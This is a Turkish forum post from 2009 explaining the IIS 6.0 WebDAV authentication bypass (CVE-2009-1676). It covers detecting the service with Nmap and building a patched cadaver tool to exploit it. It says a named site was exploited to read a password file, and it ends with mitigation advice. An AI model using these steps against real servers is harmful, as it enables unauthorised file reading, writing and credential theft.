 |
|
 |
|
|
||
|
 |
|
Seçenekler | Değerlendirme | Stil |  |
10-13-2009
|
#1 |
 DT Kayıt Tarihi: Oct 2008
Bulunduğu yer: Central City
Mesajlar: 2,669
Konular: 6359
|
Microsoft IIS 6.0 WebDAV Açığı - Tespit ve Korunma Yolu
CVE-2009-1676 güvenlik bülteni ile Microsoft IIS 6.0 web sunucusunun dosya paylaşımı için kullandığı “Webdav” servisinde uzakdan kimlik doğrulamayı bypass eden bir zaafiyet bulunduğu duyuruldu.
Web sunucuda bulunan klasorlere ve dosyalara erişim için Windows Authentication gerektiren kimlik doğrulama unicode kullanılarak bypass edilebiliniyor. Yetki dahilinde dosya okumak, dizin listelemek ve uzak sunucuya dosya yazmak (içerik eklemek) mümkün. Bu konuda elimden geldiğince sizlere bu bilgiyi paylaşmaya çalışacağım. Aktif Webdav Servisinin Tespiti IIS 5.0 da Webdav servisi varsayılan olarak açık gelir.IIS 6.0 sunucularda ise webdav servisi varsayılan olarak aktif değildir. IIS sunucuda Webdav servisinin aktif olduğunu Nmap NSE sciprti ve Enumaration araçları ile tespit edebiliriz. Nmap NSE scriptine [Linkleri görebilmeniz için 1 kaç saniyenizi ayırıp üye olmanız gerekiyor. ] adresinden ulaşabilirsiniz.  Nmap ile ozan.net adresindeki IIS 6 sunucunun Webdav servisinin aktif olduğunu öğrendik. Exploit (Suistimal) Bu zaafiyeti kullanarak hedef sistemde yapılacak işlemler hakkında aşağıdaki videoyu izleyebilirsiniz. http://www.cehturkiye.com/iis6webdav/iis6webdav.html Bilgisayarınıza indirmek için ; [Linkleri görebilmeniz için 1 kaç saniyenizi ayırıp üye olmanız gerekiyor. ] Skullsecurity.org tarafından açığı sömüren otomize edilmiş bir betik yayımlandı. Kurulumu ve kullanımı aşağıdaki gibidir ; 1-mkdir webdav 2-cd webdav 3-wget [Linkleri görebilmeniz için 1 kaç saniyenizi ayırıp üye olmanız gerekiyor. ] —— 4-wget [Linkleri görebilmeniz için 1 kaç saniyenizi ayırıp üye olmanız gerekiyor. ] —— 5-tar xzvf cadaver-0.23.2.tar.gz —— 6- cd cadaver-0.23.2/ 7- patch -p1 < ../cadaver-0.23.2-h4x.patch patching file lib/neon/ne_basic.c patching file lib/neon/ne_request.c patching file lib/neon/ne_uri.c 7-./configure —— 8- make —— Yukarıdaki adımlardan sonra “cadaver” aracı kurulmuş olucak. ./cadaver xx.xx.xx.xx şeklinde kullanabilirsiniz.  Artık dav:/> satırına düştükden sonra savunmasız dizine geçebilir.Neler olduğunu görüntüleyerek yetki dahilinde istediğiniz işlemi yapabilirsiniz. Yapılacak işlemler için aşağıdaki komutlar kullanılır ; * CD * LS * MOVE * PUT * GET * CAT * DELETE ozan.net hedefi exploit edilerek, “gizli” klasorundeki “parola.txt” içeriği okunmuştur.  Bu zaafiyetten korunmak için; - Webdav servisi kullanılmıyorsa kapatın. - Webdav ile paylaşılan klasorlerin/dosyaların yetkilerini düzenleyin - Microsoft’un yama çıkarmasını bekleyin  - Eğer bir IDS/IPS sisteminiz var imza veritabanını güncelleyin.   dokunursam gitme .. 10:39 ~ 28.o8.2∞8 ѕєη & вєη |
|
|
| Etiketler |
| 60 , açığı , iis , korunma , microsoft , tespit , ve , webdav , yolu |
«
önceki Konu
|
sonraki Konu
»
| Seçenekler | |
| Stil | Konuyu değerlendir |
Normal
|
|
|
DT online film izle alanı sayesinde film, dizi, çizgi film, belgeselleri bilgisayarınıza indirmeden online izlemeniz mümkün.. NOT : Sitemizdeki bütün video ( film , dizi ) içerikleri video.google.com ve video.yahoo.com adreslerinden RSS botuyla çekilmektedir. Bu adreslerden içeriğin silinmesi durumunda sitemizde ilgili videoları izlemeniz mümkün değildir. Anlayışınız için teşekkür ederiz. |
WEZ Format +2. Şuan Saat: 02:20 AM.
